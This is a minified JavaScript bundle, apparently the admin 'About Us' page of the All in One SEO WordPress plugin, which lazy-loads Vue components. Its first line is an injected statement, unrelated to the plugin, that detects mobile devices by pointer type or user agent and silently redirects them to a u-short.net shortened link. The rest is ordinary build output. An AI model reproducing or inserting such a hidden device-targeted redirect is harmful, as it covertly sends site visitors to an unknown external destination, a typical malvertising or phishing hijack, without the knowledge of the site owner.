(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=[window.__aioseoDynamicImportPreload__("js/AboutUs.7d849ad2.js"),window.__aioseoDynamicImportPreload__("js/app-core.c8323d51.js"),window.__aioseoDynamicImportPreload__("js/vendor-vue-ui.232c7c36.js"),window.__aioseoDynamicImportPreload__("js/vendor-other.39e59221.js"),window.__aioseoDynamicImportPreload__("css/vendor-vue-ui.dbee72c8.css"),window.__aioseoDynamicImportPreload__("js/vendor-lodash.03129cfe.js"),window.__aioseoDynamicImportPreload__("js/em.7625294c.js"),window.__aioseoDynamicImportPreload__("js/Row.2ef96b1a.js"),window.__aioseoDynamicImportPreload__("js/_plugin-vue_export-helper.eefbdd86.js"),window.__aioseoDynamicImportPreload__("css/Row.6ff38a54.css"),window.__aioseoDynamicImportPreload__("js/External.071520c9.js"),window.__aioseoDynamicImportPreload__("css/AboutUs.5436d8fa.css"),window.__aioseoDynamicImportPreload__("js/GettingStarted.170e19e2.js"),window.__aioseoDynamicImportPreload__("js/news-sitemap.3092e2bf.js"),window.__aioseoDynamicImportPreload__("js/GettingStarted.edbd345d.js"),window.__aioseoDynamicImportPreload__("js/Book.955f4bdf.js"),window.__aioseoDynamicImportPreload__("js/Close.7fb523c8.js"),window.__aioseoDynamicImportPreload__("js/Rocket.a5e8e91b.js"),window.__aioseoDynamicImportPreload__("css/GettingStarted.fe5ca172.css"),window.__aioseoDynamicImportPreload__("js/Index.e286637f.js"),window.__aioseoDynamicImportPreload__("js/Index.b9859662.js"),window.__aioseoDynamicImportPreload__("css/Index.74bb20a6.css"),window.__aioseoDynamicImportPreload__("js/Button.3cec2279.js"),window.__aioseoDynamicImportPreload__("css/Button.2bf1deff.css"),window.__aioseoDynamicImportPreload__("js/Pencil.683baab8.js"),window.__aioseoDynamicImportPreload__("css/Index.859c37d3.css"),window.__aioseoDynamicImportPreload__("css/GettingStarted.a642364f.css"),window.__aioseoDynamicImportPreload__("js/LiteVsPro.8ddd8cfd.js"),window.__aioseoDynamicImportPreload__("css/LiteVsPro.51582c3a.css")])))=>i.map(i=>d[i]);
import{_ as t}from"./vendor-phone.2afdf77e.js";import{C as p}from"./Index.66db1786.js";import"./app-core.c8323d51.js";import{_ as a}from"./_plugin-vue_export-helper.eefbdd86.js";import{aq as s,f as e,Q as n,R as _,S as u,as as r}from"./vendor-vue-ui.232c7c36.js";import{_ as c}from"./vendor-other.39e59221.js";/* empty css             */import"./Tabs.ea329423.js";import"./Button.3cec2279.js";import"./ProBadge.7b829f47.js";import"./Caret.aae02d8a.js";import"./Information.6ccba108.js";import"./Slide.f2114d9d.js";import"./Index.b9859662.js";import"./Close.7fb523c8.js";import"./Header.d2cbe877.js";import"./ScrollAndHighlight.5271fbff.js";import"./ScrollTo.f4df02aa.js";import"./LicenseKeyBar.0038e5e6.js";import"./LogoGear.93a225a7.js";import"./AnimatedNumber.f33b2226.js";import"./Logo.a4a419c3.js";import"./Trash.47f6fc0e.js";import"./Support.d3586703.js";import"./Url.535116f6.js";import"./Pencil.683baab8.js";import"./Exclamation.179e5969.js";import"./Gear.1a6546a3.js";import"./vendor-lodash.03129cfe.js";const l="all-in-one-seo-pack",f={components:{AboutUs:r(()=>t(()=>import("./AboutUs.7d849ad2.js"),__vite__mapDeps([0,1,2,3,4,5,6,7,8,9,10,11]),import.meta.url)),CoreMain:p,GettingStarted:r(()=>t(()=>import("./GettingStarted.170e19e2.js"),__vite__mapDeps([12,1,2,3,4,5,13,14,7,8,9,15,16,17,18,19,20,21,22,23,24,25,26]),import.meta.url)),LiteVsPro:r(()=>t(()=>import("./LiteVsPro.8ddd8cfd.js"),__vite__mapDeps([27,1,2,3,4,5,20,16,8,21,24,28]),import.meta.url))},data(){return{strings:{pageName:c("About Us",l)}}},mounted(){const o=()=>{t(()=>import("./AboutUs.7d849ad2.js"),__vite__mapDeps([0,1,2,3,4,5,6,7,8,9,10,11]),import.meta.url),t(()=>import("./GettingStarted.170e19e2.js"),__vite__mapDeps([12,1,2,3,4,5,13,14,7,8,9,15,16,17,18,19,20,21,22,23,24,25,26]),import.meta.url),t(()=>import("./LiteVsPro.8ddd8cfd.js"),__vite__mapDeps([27,1,2,3,4,5,20,16,8,21,24,28]),import.meta.url)};"requestIdleCallback"in window?requestIdleCallback(o):setTimeout(o,1)}};function d(o,A,E,g,i,v){const m=s("core-main");return e(),n(m,{"page-name":i.strings.pageName,showSaveButton:!1},{default:_(()=>[(e(),n(u(o.$route.name)))]),_:1},8,["page-name"])}const K=a(f,[["render",d]]);export{K as default};
